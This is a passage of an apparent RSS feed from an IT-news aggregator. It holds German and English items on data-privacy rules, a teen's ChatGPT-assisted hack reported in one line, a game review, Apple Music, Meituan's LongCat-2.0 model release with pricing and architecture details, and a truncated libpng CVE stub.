<p>Handlungshektik ist also nicht angesagt. Allerdings sollten Unternehmen, die sich bei der Übermittlung personenbezogener Daten auf das DPF stützen, ihre Vorgehensweise zeitnah überprüfen. Eventuell eignen sich auch <a href="https://www.computerwoche.de/article/3954630/was-tun-wenn-das-eu-us-data-privacy-framework-fallt.html?utm=hybrid_search">Standardvertragsklauseln (SCCs)</a> und interne Datenschutzvorschriften (Binding Corporate Rules – BCRs) als Lösung. Ebenso stehen auch diese auf wackeligen Beinen, wenn es in den USA keine unabhängige Aufsicht mehr gibt.</p>



<h2 class="wp-block-heading">Volatilität der Regulierung droht</h2>



<p>Im US-Geschäft sollten sich Unternehmen in Bezug auf Daten auf eine größere regulatorische Volatilität einstellen. Ebenso gilt es genau zu prüfen, inwieweit die souveränen Cloud- und Serviceangebote der US-Anbieter in Europa wirklich sicher vor dem Zugriff der US-Behörden sind.</p>



<p>Und vor dem Hintergrund des Urteils sollte Datenverschlüsselung bei der Nutzung von US-Services zum Standard gehörten. Ferner sollte die Suche nach souveränen europäischen Alternativen eigentlich standardmäßig im Pflichtenheft jedes IT-Entscheiders stehen. Oder, um abschließend <a href="https://de.linkedin.com/in/bernd-wagner">Bernie Wagner</a> von Schwarz Digits, zu zitieren: „<a href="https://www.cio.de/article/4175489/schwarz-digits-cso-wagner-wer-freiheit-will-muss-heute-anfangen-2.html?utm=hybrid_search">Wer Freiheit will, muss heute anfangen</a>“.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vibe Coding: Schüler hackt Streaminganbieter mit ChatGPT-Programm - Golem.de]]></title>
<description><![CDATA[KI-Einsatz in der IT-Sicherheit: Pentesting, Schwachstellenscans, Reporting – virtueller ... SecurityCybercrimeStreamingBandai Namco ...]]></description>
<link>https://tsecurity.de/de/3649406/it-security-nachrichten/vibe-coding-schueler-hackt-streaminganbieter-mit-chatgpt-programm-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649406/it-security-nachrichten/vibe-coding-schueler-hackt-streaminganbieter-mit-chatgpt-programm-golemde/</guid>
<pubDate>Mon, 06 Jul 2026 18:42:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[KI-Einsatz in der <b>IT</b>-<b>Sicherheit</b>: Pentesting, Schwachstellenscans, Reporting – virtueller ... SecurityCybercrimeStreamingBandai Namco ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Vibe Coding: Schüler hackt Streaminganbieter mit ChatGPT-Programm]]></title>
<description><![CDATA[Ein 15-Jähriger ist in Japan verhaftet worden, da er sich in den Anime-Streamingdienst von Bandai eingehackt hat - mithilfe von ChatGPT. (KI, Bandai Namco)]]></description>
<link>https://tsecurity.de/de/3648462/it-nachrichten/vibe-coding-schueler-hackt-streaminganbieter-mit-chatgpt-programm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648462/it-nachrichten/vibe-coding-schueler-hackt-streaminganbieter-mit-chatgpt-programm/</guid>
<pubDate>Mon, 06 Jul 2026 12:33:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein 15-Jähriger ist in Japan verhaftet worden, da er sich in den Anime-Streamingdienst von Bandai eingehackt hat - mithilfe von ChatGPT. (<a href="https://www.golem.de/specials/ki/">KI</a>, <a href="https://www.golem.de/specials/namco-bandai/">Bandai Namco</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=210541&amp;page=1&amp;ts=1783333501" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[Week in Review: Most popular stories on GeekWire for the week of June 28, 2026]]></title>
<description><![CDATA[See the technology stories that people were reading on GeekWire for the week of June 28, 2026. Read More]]></description>
<link>https://tsecurity.de/de/3646898/it-nachrichten/week-in-review-most-popular-stories-on-geekwire-for-the-week-of-june-28-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646898/it-nachrichten/week-in-review-most-popular-stories-on-geekwire-for-the-week-of-june-28-2026/</guid>
<pubDate>Sun, 05 Jul 2026 17:18:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1200" height="630" src="https://cdn.geekwire.com/wp-content/uploads/2015/11/geekwire-week-in-review1.png" class="webfeedsFeaturedVisual wp-post-image" alt="GeekWire Week in Review" decoding="async" srcset="https://cdn.geekwire.com/wp-content/uploads/2015/11/geekwire-week-in-review1.png 1200w, https://cdn.geekwire.com/wp-content/uploads/2015/11/geekwire-week-in-review1-620x326.png 620w" sizes="(max-width: 1200px) 100vw, 1200px"><br>See the technology stories that people were reading on GeekWire for the week of June 28, 2026. <a href="https://www.geekwire.com/2026/geekwire-weekly-roundup-2026-06-28/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rhythm Paradise Groove review – exhilarating bitesize beats test your reflexes]]></title>
<description><![CDATA[Nintendo/TNX; Nintendo SwitchA joyful collection of vibrant rhythm games includes catching veggies in mid-air, practising dance choreographies and speaking to an alienIt has been a strange decade for the rhythm game genre. The legendary progenitors Rock Band and Guitar Hero are seemingly gone, ye...]]></description>
<link>https://tsecurity.de/de/3640565/it-nachrichten/rhythm-paradise-groove-review-exhilarating-bitesize-beats-test-your-reflexes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640565/it-nachrichten/rhythm-paradise-groove-review-exhilarating-bitesize-beats-test-your-reflexes/</guid>
<pubDate>Thu, 02 Jul 2026 10:47:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><strong>Nintendo/TNX; Nintendo Switch<br></strong>A joyful collection of vibrant rhythm games includes catching veggies in mid-air, practising dance choreographies and speaking to an alien</p><p>It has been a strange decade for the rhythm game genre. The legendary progenitors Rock Band and Guitar Hero are seemingly gone, yet companies are manufacturing plastic guitars again. Tango Gameworks, a studio best known for delivering survival horror hauntings, made Hi-Fi Rush and it ruled, but Microsoft sold the studio. Indie titles such as Sayonara Wild Hearts and Rift of the NecroDancer have done well on the margins, but now Epic Games has swept in, adding a rhythm action mode to Fortnite so now its mainstream again. All these titles have reinforced the ideas laid out by their forefathers: rhythm can intersect with video games as much as it already intersects with our everyday lives.</p><p>Few series hold this ethos to heart as strongly as Rhythm Heaven. Dormant since 2015, a new entry, Rhythm Heaven Groove (known as Rhythm Paradise Groove in Pal territories), doubles down on the concept of offering bitesize, rhythm-based experiences where you follow auditive cues to perform all manner of increasingly exhilarating actions with just a few buttons. Whether you’re catching veggies in mid-air, practising dance choreographies, or speaking to an alien, each mini-game is intended to be a vibrant, micro cacophony with its own rules.</p> <a href="https://www.theguardian.com/games/2026/jul/02/rhythm-paradise-heaven-groove-review-nintendo-switch">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Die 20 meistgestreamten Musiker auf Apple Music aller Zeiten]]></title>
<description><![CDATA[Apple Music hat die meistgestreamten Künstler*innen seit dem Start des Musikdienstes im Sommer 2015 veröffentlicht. Die Top 20 (via AppleInsider) vereint die größten Stars aus Hip-Hop, Pop, Rap und verwandten Genres.]]></description>
<link>https://tsecurity.de/de/3638874/it-nachrichten/die-20-meistgestreamten-musiker-auf-apple-music-aller-zeiten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638874/it-nachrichten/die-20-meistgestreamten-musiker-auf-apple-music-aller-zeiten/</guid>
<pubDate>Wed, 01 Jul 2026 16:46:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple Music hat die meistgestreamten Künstler*innen seit dem Start des Musikdienstes im Sommer 2015 veröffentlicht. Die Top 20 (via AppleInsider) vereint die größten Stars aus Hip-Hop, Pop, Rap und verwandten Genres.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Music's billions of streams, billions of dollars in fines, and one failure]]></title>
<description><![CDATA[On June 30, 2015, Apple launched Apple Music that has brought music pleasure to millions, a social media feature you probably don't remember and cost Apple billions in fines.It's fine to be nostalgic for red blobs.If you joined Apple Music when it first launched and have stayed with it since, you...]]></description>
<link>https://tsecurity.de/de/3635910/ios-mac-os/apple-musics-billions-of-streams-billions-of-dollars-in-fines-and-one-failure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635910/ios-mac-os/apple-musics-billions-of-streams-billions-of-dollars-in-fines-and-one-failure/</guid>
<pubDate>Tue, 30 Jun 2026 16:24:41 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[On June 30, 2015, Apple launched <a href="https://appleinsider.com/inside/apple-music" title="Apple Music" data-kpt="1">Apple Music</a> that has brought music pleasure to millions, a social media feature you probably don't remember and cost Apple billions in fines.<br><br><div><img src="https://photos5.appleinsider.com/gallery/64175-133621-000-lead-Apple-Music-blobs-xl.jpg" alt="Red circles with white text list music genres like country, pop, hip-hop, blues, reggae, and more. Instructions above suggest clicking on preferred genres." height="720"><br><span>It's fine to be nostalgic for red blobs.</span></div><br>If you joined Apple Music when it <a href="https://appleinsider.com/articles/15/06/11/everything-you-need-to-know-about-apple-music">first launched</a> and have stayed with it since, you have easily paid out more than a thousand dollars. The price has gone up over the years, too, plus there are more expensive tiers with a family plan, cheaper ones with the student offering, and Apple Music is also part of the <a href="https://appleinsider.com/inside/apple-one/tips/is-the-apple-one-subscription-bundle-worth-it-in-fall-2023">Apple One bundle</a>, but you've been paying something for over a decade.<br><br>What won't have happened during that time, though, is that you've ever had the service for free — at least not other than some limited-time trial periods. Unlike its rivals, specifically Spotify, Apple Music does not offer a free ad-supported version.<br><br><br> <a href="https://appleinsider.com/articles/25/06/30/apple-musics-ten-years-billions-of-dollars-in-fines-and-one-failure?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/240840?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meituan open sources LongCat-2.0, the 1.6T, near-frontier agentic coding model that's been leading OpenRouter — trained entirely on Chinese chips]]></title>
<description><![CDATA[A few hours ago, Chinese delivery app company Meituan officially unveiled LongCat-2.0 on GitHub, Hugging Face, and its native platform, unmasking the model as the computational engine behind "Owl Alpha," the anonymous stealth model that has spent the last two months commanding global developer ch...]]></description>
<link>https://tsecurity.de/de/3634858/it-nachrichten/meituan-open-sources-longcat-20-the-16t-near-frontier-agentic-coding-model-thats-been-leading-openrouter-trained-entirely-on-chinese-chips/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634858/it-nachrichten/meituan-open-sources-longcat-20-the-16t-near-frontier-agentic-coding-model-thats-been-leading-openrouter-trained-entirely-on-chinese-chips/</guid>
<pubDate>Tue, 30 Jun 2026 09:47:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A few hours ago, Chinese delivery app company <a href="https://longcat.chat/blog/longcat-2.0/">Meituan officially unveiled LongCat-2.0 </a>on <a href="https://github.com/meituan-longcat/LongCat-2.0">GitHub</a>, <a href="https://huggingface.co/meituan-longcat/LongCat-2.0/blob/main/LICENSE">Hugging Face</a>, and its native platform, unmasking the model as the computational engine behind "Owl Alpha," the anonymous stealth model that has spent the last two months commanding global developer charts on OpenRouter. </p><p>Developed to fundamentally disrupt closed-source enterprise dominance in autonomous software engineering, the 1.6-trillion-parameter Mixture-of-Experts (MoE) system brings a native 1-million-token context window to the public domain under a highly permissive, enterprise grade, commercially viable MIT license. </p><p>Commercial access to the architecture introduces a highly aggressive pricing tier, deploying a mechanism where all context-cache hits are processed completely<i> free of charge</i>, running alongside a time-limited "<a href="https://longcat.chat/platform/docs/TokenPack.html">Token Pack</a>" flash-sale paradigm. There's also a typical <a href="https://longcat.chat/platform/docs/APIPayAsYouGo.html">"pay-as-you-go" API</a> for non-cache hits standard priced at $0.75/$2.95 per million tokens in/out.</p><p>However, a limited-time promotional discount aggressively slashes these operational expenditures down to $0.30 per million tokens for uncached input and $1.20 per million tokens for output, both on the cheaper-end of top performing models globally. </p><table><tbody><tr><td><p><b>Model</b></p></td><td><p><b>Input ($/1M)</b></p></td><td><p><b>Output ($/1M)</b></p></td><td><p><b>Total ($/1M)</b></p></td><td><p><b>Source</b></p></td></tr><tr><td><p>MiMo-V2.5 Flash</p></td><td><p>$0.10</p></td><td><p>$0.30</p></td><td><p>$0.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>deepseek-v4-flash</p></td><td><p>$0.14</p></td><td><p>$0.28</p></td><td><p>$0.42</p></td><td><p><a href="https://api-docs.deepseek.com/quick_start/pricing">DeepSeek</a></p></td></tr><tr><td><p>deepseek-v4-pro</p></td><td><p>$0.435</p></td><td><p>$0.87</p></td><td><p>$1.305</p></td><td><p><a href="https://api-docs.deepseek.com/quick_start/pricing">DeepSeek</a></p></td></tr><tr><td><p>MiniMax-M3</p></td><td><p>$0.30</p></td><td><p>$1.20</p></td><td><p>$1.50</p></td><td><p><a href="https://platform.minimax.io/subscribe/token-plan?tab=api-enterprise">MiniMax</a></p></td></tr><tr><td><p><b>LongCat-2.0 — limited-time promo</b></p></td><td><p><b>$0.30</b></p></td><td><p><b>$1.20</b></p></td><td><p><b>$1.50</b></p></td><td><p><b></b><a href="https://longcat.chat/platform/docs/APIPayAsYouGo.html"><b>LongCat</b></a><b></b></p></td></tr><tr><td><p>Gemini 3.1 Flash-Lite</p></td><td><p>$0.25</p></td><td><p>$1.50</p></td><td><p>$1.75</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Qwen3.7-Plus</p></td><td><p>$0.40</p></td><td><p>$1.60</p></td><td><p>$2.00</p></td><td><p><a href="https://modelstudio.console.alibabacloud.com/ap-southeast-1?tab=doc#/doc/?type=model&amp;url=2840914_2&amp;modelId=qwen3.7-plus&amp;serviceSite=international">Alibaba Cloud</a></p></td></tr><tr><td><p>MiMo-V2.5</p></td><td><p>$0.40</p></td><td><p>$2.00</p></td><td><p>$2.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p><b>LongCat-2.0 — standard</b></p></td><td><p><b>$0.75</b></p></td><td><p><b>$2.95</b></p></td><td><p><b>$3.70</b></p></td><td><p><b></b><a href="https://longcat.chat/platform/docs/APIPayAsYouGo.html"><b>LongCat</b></a></p></td></tr><tr><td><p>Grok 4.3 (low context)</p></td><td><p>$1.25</p></td><td><p>$2.50</p></td><td><p>$3.75</p></td><td><p><a href="https://docs.x.ai/developers/models/grok-4.3">xAI</a></p></td></tr><tr><td><p>MiMo-V2.5 Pro (≤256K)</p></td><td><p>$1.00</p></td><td><p>$3.00</p></td><td><p>$4.00</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>Kimi-K2.6</p></td><td><p>$0.95</p></td><td><p>$4.00</p></td><td><p>$4.95</p></td><td><p><a href="https://platform.kimi.ai/docs/pricing/chat-k26">Moonshot AI</a></p></td></tr><tr><td><p>GLM-5.2</p></td><td><p>$1.40</p></td><td><p>$4.40</p></td><td><p>$5.80</p></td><td><p><a href="https://docs.z.ai/guides/overview/pricing">Z.ai</a></p></td></tr><tr><td><p>GPT-5.6 Luna</p></td><td><p>$1.00</p></td><td><p>$6.00</p></td><td><p>$7.00</p></td><td><p><a href="https://openai.com/index/previewing-gpt-5-6-sol/">OpenAI</a></p></td></tr><tr><td><p>Grok 4.3 (high context)</p></td><td><p>$2.50</p></td><td><p>$5.00</p></td><td><p>$7.50</p></td><td><p><a href="https://docs.x.ai/developers/models/grok-4.3">xAI</a></p></td></tr><tr><td><p>MiMo-V2.5 Pro (&gt;256K)</p></td><td><p>$2.00</p></td><td><p>$6.00</p></td><td><p>$8.00</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>Qwen3.7-Max</p></td><td><p>$2.50</p></td><td><p>$7.50</p></td><td><p>$10.00</p></td><td><p><a href="https://modelstudio.console.alibabacloud.com/ap-southeast-1?tab=doc#/doc/?type=model&amp;url=2840914_2&amp;modelId=qwen3.7-max&amp;serviceSite=international">Alibaba Cloud</a></p></td></tr><tr><td><p>Gemini 3.5 Flash</p></td><td><p>$1.50</p></td><td><p>$9.00</p></td><td><p>$10.50</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Gemini 3.1 Pro Preview (≤200K)</p></td><td><p>$2.00</p></td><td><p>$12.00</p></td><td><p>$14.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>GPT-5.6 Terra</p></td><td><p>$2.50</p></td><td><p>$15.00</p></td><td><p>$17.50</p></td><td><p><a href="https://openai.com/index/previewing-gpt-5-6-sol/">OpenAI</a></p></td></tr><tr><td><p>GPT-5.4</p></td><td><p>$2.50</p></td><td><p>$15.00</p></td><td><p>$17.50</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr><tr><td><p>Gemini 3.1 Pro Preview (&gt;200K)</p></td><td><p>$4.00</p></td><td><p>$18.00</p></td><td><p>$22.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Claude Opus 4.8</p></td><td><p>$5.00</p></td><td><p>$25.00</p></td><td><p>$30.00</p></td><td><p><a href="https://platform.claude.com/docs/en/about-claude/pricing">Anthropic</a></p></td></tr><tr><td><p>GPT-5.5</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr><tr><td><p>GPT-5.5 Instant (chat-latest)</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://developers.openai.com/api/docs/models/chat-latest">OpenAI</a></p></td></tr><tr><td><p>Sakana Fugu Ultra (≤272K)</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://console.sakana.ai/pricing#subscription-plan">Sakana AI</a></p></td></tr><tr><td><p>GPT-5.6 Sol</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://openai.com/index/previewing-gpt-5-6-sol/">OpenAI</a></p></td></tr><tr><td><p>Claude Fable 5 / Claude Mythos 5</p></td><td><p>$10.00</p></td><td><p>$50.00</p></td><td><p>$60.00</p></td><td><p><a href="https://platform.claude.com/docs/en/about-claude/models/overview">Anthropic</a></p></td></tr></tbody></table><p>What makes the release a definitive inflection point for global tech infrastructure is its operational independence: the massive model was trained entirely on a cluster of over 50,000 domestic Chinese Application-Specific Integrated Circuits (ASICs), proving that near-frontier AI models can be scaled successfully without relying on the typical U.S. Nvidia GPUs that have, to date, powered much of the global generative AI frontier model training effort. </p><p>This successful deployment of alternative silicon signals a profound structural shift. If Chinese conglomerates can consistently iterate trillion-parameter architectures using homegrown ASICs rather than general-purpose GPUs, it would seem to threaten Nvidia's dominance in this sector. </p><p>Crucially, this technological pivot arrives precisely as Washington pressures top-tier American labs to restrict access to their latest models. Following a U.S. governmental request,<a href="https://venturebeat.com/technology/openai-unveils-gpt-5-6-sol-terra-and-luna-models-but-only-accessible-to-limited-preview-partners-for-now-per-us-gov"> OpenAI was forced to limit access to its new GPT-5.6 models</a>, while Anthropic was previously also <a href="https://venturebeat.com/technology/anthropic-blocks-all-public-access-to-claude-fable-5-mythos-5-following-us-government-order-what-enterprises-should-do">ordered by the U.S. </a>to restrict access to its latest Claude Fable 5 / Mythos 5 models, which it took entirely offline in response. At the same time, a growing chorus of <a href="https://www.axios.com/2026/06/29/trump-ai-model-release-delays-tech-backlash">technologists</a>, <a href="https://thehill.com/policy/technology/5925364-ai-regulation-anthropic-trump-administration/">activists</a>, and industry experts warn that these defensive regulatory maneuvers have inadvertently backfired. By locking down Western closed-source models and driving up API costs, the U.S. government has left a wide operational window for global developers seeking affordable, high-performance alternatives like those found in Chinese open source models such as Meituan LongCat-2.0.</p><p>The raw operational metrics backed up the developer enthusiasm: during its unbranded residency on <a href="https://openrouter.ai/openrouter/owl-alpha">OpenRouter, Owl Alpha</a> accounted for approximately 10.1 trillion monthly tokens—averaging 559 billion tokens per day—representing a 242% month-over-month explosion in volume that propelled it into the platform's global top three.</p><p>By the time Meituan stepped forward to claim the architecture, the model had already secured the top ranking on the Hermes Agent workspace, second place on Claude Code deployments, and third place across international OpenClaw environments.</p><h2><b>Technology: Engineering the 1M-Token Sparse Context</b></h2><p>At the core of LongCat-2.0 lies an aggressive optimization of Mixture-of-Experts (MoE) sparsity, scaling total parameters to 1.6 trillion while limiting active computation to an average of 48 billion parameters per token.</p><p>Depending on the structural complexity of a query, the model’s dynamic activation ranges from 33 billion to 56 billion parameters. This design implements a "Zero-Compute Experts" framework, ensuring that routine execution elements pass through lighter subnetworks, entirely eliminating the idle computational overhead that typically penalizes ultra-dense models.</p><p>To sustain a functional 1-million-token context window without incurring catastrophic hardware bottlenecks, Meituan introduced LongCat Sparse Attention (LSA). Designed as an evolutionary iteration of DeepSeek Sparse Attention, LSA resolves the quadratic scoring costs and memory fragmentation that typically plague fine-grained sparse mechanisms through three distinct, orthogonal vectors:</p><ul><li><p><b>Streaming-aware Indexing (SI):</b> This system restructures the token selection pipeline by blending hardware-aligned contiguous data reads with dynamic random selection. By converting fragmented memory access into highly predictable, sequential blocks, the system achieves coalesced High Bandwidth Memory (HBM) utilization and elevated effective bandwidth.</p></li><li><p><b>Cross-Layer Indexing (CLI):</b> Leveraging the empirical reality that attention saliency remains highly stable across adjacent hidden layers, CLI amortizes calculation costs. A single indexing pass successfully guides multiple consecutive layers during inference, a capability reinforced by cross-layer distillation throughout the training phase.</p></li><li><p><b>Hierarchical Indexing (HI):</b> This approach applies a coarse-to-fine, two-stage scoring layout. The indexer performs a rapid, approximate block-level recall to filter candidates, before running fine-grained token selection exclusively on the remaining population.</p></li></ul><p>Furthermore, Meituan integrated an N-gram Embedding module inherited from its lighter model lines. By expanding parameter allocation in sparse dimensions completely orthogonal to the MoE expert layout, the architecture appends 135 billion parameters to a 5-gram token combination framework. </p><p>This expands the core embedding space by roughly 100-fold, allowing the model to capture dense local token relationships and accelerate large-batch inference operations by reducing memory Input/Output (I/O) bottlenecks.</p><h2><b>Product: Post-Training, MOPD Framework and Benchmark Performance</b></h2><p>While generalist large language models prioritize fluid, conversational interfaces, LongCat-2.0 focuses explicitly on multi-step engineering tasks, tool integration, and automated repository manipulation — agentic tasks, in other words. </p><p>In standardized assessments, LongCat-2.0 registers an empirical 59.5 on SWE-bench Pro, surpassing GPT-5.5's benchmark of 58.6. The model further establishes its agentic specialization by marking a 70.8 on Terminal-Bench 2.1, a 77.3 on SWE-bench Multilingual, and a 73.2 on the general corporate workflow simulator FORTE.</p><p>This precise operational behavior is achieved through a structural post-training layer called Multi-Teacher Optimization via Mixture of Specialized Experts (MOPD). Rather than blending raw human feedback into a singular reward function, the MOPD architecture segregates post-training optimization into three independent, highly focused expert clusters.</p><ul><li><p>The <b>Agent Experts</b> are fine-tuned strictly for structural execution, specializing in precise tool invocation, multi-turn API parameter parsing, and self-correcting loop mechanisms to avoid execution stagnation.</p></li><li><p>The <b>Reasoning Experts</b> are optimized in isolation to advance multi-hop logic, complex chain-of-thought engineering, mathematics, and high-level STEM problem-solving.</p></li><li><p>The <b>Interaction Experts</b> focus entirely on human alignment, instruction-following nuances, factual grounding to suppress hallucinations, and maintaining rigid safety guardrails without diminishing the model's overall utility.</p></li></ul><p>By segregating these vectors during post-training, LongCat-2.0 prevents functional degradation. A dynamic gate-routing mechanism then seamlessly fuses these specialized behaviors at runtime, allowing the final model to coordinate deep reasoning, stable tool execution, and safe user interaction simultaneously</p><p>While LongCat-2.0 generally trails premium frontier systems like Claude Opus 4.8 across broad general-agent benchmarks such as FORTE and BrowseComp, it explicitly punches above its weight in software engineering. </p><p>What makes this open-weight architecture special is its hyper-focus on autonomous development; it manages to narrowly exceed OpenAI's proprietary GPT-5.5 on the rigorous software engineering benchmark SWE-bench Pro (scoring 59.5 against 58.6), proving it is highly capable and fiercely competitive for complex coding tasks despite a leaner computational footprint.</p><h2><b>Commercial Framework: Pay-As-You-Go vs. Flash-Sale Token Packs</b></h2><p>Meituan's deployment strategy introduces a specialized commercial model that splits network access between conventional real-time API billing and structured "Token Packs". </p><p>For traditional enterprise integration, standard top-up accounts are available, deducting operational capital in real time based directly on token input and generation metrics.</p><p>However, to accommodate the unpredictable compute bursts characteristic of autonomous development agents, Meituan launched a structured Token Pack framework. Purchased as fixed, one-time volumetric allocations valid for a strict 30-day window, these packages stack directly on top of an organization's existing baseline API account. </p><p>To manage network load across its ASIC clusters, Meituan releases these high-volume packages via limited flash sales four times daily, precisely at 10:00, 16:00, 21:00, and 23:00 Beijing Time on a first-come, first-served basis.The economic standout of this framework is the zero-charge processing of context cache hits. </p><p>In massive agentic environments where a coding assistant must repeatedly read, reference, and modify the same multi-million-token code repository over an extended session, standard architectures penalize developers by charging full pricing for repeated input context. </p><p>Under Meituan's infrastructure, only cache-miss inputs and final token generations consume the package quota. This architecture completely alters the operational cost economics of large-scale agent software development, enabling deep iterative context exploration without compounding costs.</p><h2><b>Licensing: Open-Source Structural Freedom</b></h2><p>By registering the LongCat-2.0 repository under the open-source MIT License, Meituan positions the architecture with maximum legal flexibility for enterprise integration. </p><p>In contrast to copyleft paradigms like the GNU General Public License (GPL)—which legally obligates developers to open-source any derivative frameworks or internal software that links to the code—the MIT license permits near-unrestricted freedom.</p><p>For corporate engineering teams, this legal standard ensures that LongCat-2.0 can be deeply modified, compiled, and hard-coded directly into closed-source commercial applications, proprietary dev tools, and internal automation backends. </p><p>Corporations can fork the repository, optimize the internal LSA mechanisms for private databases, and sell the resulting software stack to end users without any obligation to disclose their proprietary intellectual property or structural enhancements.</p><h2><b>Meituan's Evolution: From Delivery Super App to AI Powerhouse</b></h2><p>Founded in March 2010 by serial entrepreneur <a href="https://www.howtheybegan.com/founders/wang-xing">Wang Xing</a>, Meituan initially launched as a Groupon-style daily deals website before rapidly evolving into one of China’s dominant “super apps”. </p><p>Following a massive 2015 merger with Dianping, the Beijing-based tech giant solidified a dominant market share over the country's urban delivery corridors, bridging local consumer reviews, instant retail, hotel bookings, and food delivery. Operating as a publicly traded powerhouse on the Hong Kong Stock Exchange, Meituan claims over 770 million annual transacting users and supports a network of more than 14.5 million merchants. </p><p>However, faced with intense domestic market competition, severe margin compression, and a sliding profit margin, the company aggressively pivoted its strategy beyond logistics. Meituan publicly committed to investing "billions" into artificial intelligence and domestic chip capabilities to revitalize its technology-driven offerings. </p><p>This strategic shift into the global AI race began materializing in late 2025 with the release of LongCat-Flash, a 560-billion-parameter Mixture-of-Experts foundation model, followed quickly by the advanced reasoning model LongCat-Flash-Thinking. By open-sourcing these frontier-class models under enterprise-friendly licenses, Meituan signaled its ambition to become a foundational player in global AI infrastructure rather than remaining strictly a regional e-commerce and delivery giant. </p><h2><b>Enterprise Implications: Autonomous Operational Workflows</b></h2><p>For modern enterprises, the release of LongCat-2.0 unlocks clear operational strategies across software engineering, system operations, and long-form data interpretation. </p><p>The combination of an open-weight, MIT-licensed model with an expansive 1-million-token context window means organizations can bypass the data privacy concerns and recurring overhead associated with hosting proprietary third-party APIs.In large-scale enterprise development environments, teams can leverage the model's specialized Agent Experts to orchestrate autonomous codebase migrations. </p><p>Instead of dedicating hundreds of developer hours to manually rewriting legacy application frameworks, engineers can pass an entire enterprise repository along with modern SDK documentation directly into the 1-million-token context window. LongCat-2.0 can map the dependencies, execute the repository-level structural updates, compile the new codebase, and catch compilation and execution bugs autonomously within local sandbox environments before generating a final pull request.</p><p>The model's architectural separation via the MOPD gate-routing mechanism yields significant advantages for strict enterprise compliance. By routing specific operational queries through isolated expert clusters, a financial institution or healthcare firm can deploy deep logic and mathematical reasoning passes without risking factual hallucination or violating strict safety bounds. </p><p>The Interaction Experts function as an implicit guardrail layer, suppressing errors and enforcing instruction-following protocols without degrading the raw processing power of the internal Reasoning Experts. Combined with the zero-cost caching model, enterprises can maintain hyper-focused autonomous software networks that can repeatedly inspect corporate data pools, continuously maintaining and optimizing internal infrastructure at a fraction of standard operational costs.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-8540 | libpng up to 1.5.25 pngwutil.c png_check_keyword numeric error (RHSA-2016:1430 / Nessus ID 89053)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in libpng up to 1.5.25. Affected by this issue is the function png_check_keyword of the file pngwutil.c. The manipulation leads to numeric error.

This vulnerability is documented as CVE-2015-8540. The attack can be initiated remot...]]></description>
<link>https://tsecurity.de/de/3632417/sicherheitsluecken/cve-2015-8540-libpng-up-to-1525-pngwutilc-pngcheckkeyword-numeric-error-rhsa-20161430-nessus-id-89053/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632417/sicherheitsluecken/cve-2015-8540-libpng-up-to-1525-pngwutilc-pngcheckkeyword-numeric-error-rhsa-20161430-nessus-id-89053/</guid>
<pubDate>Mon, 29 Jun 2026 11:10:45 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
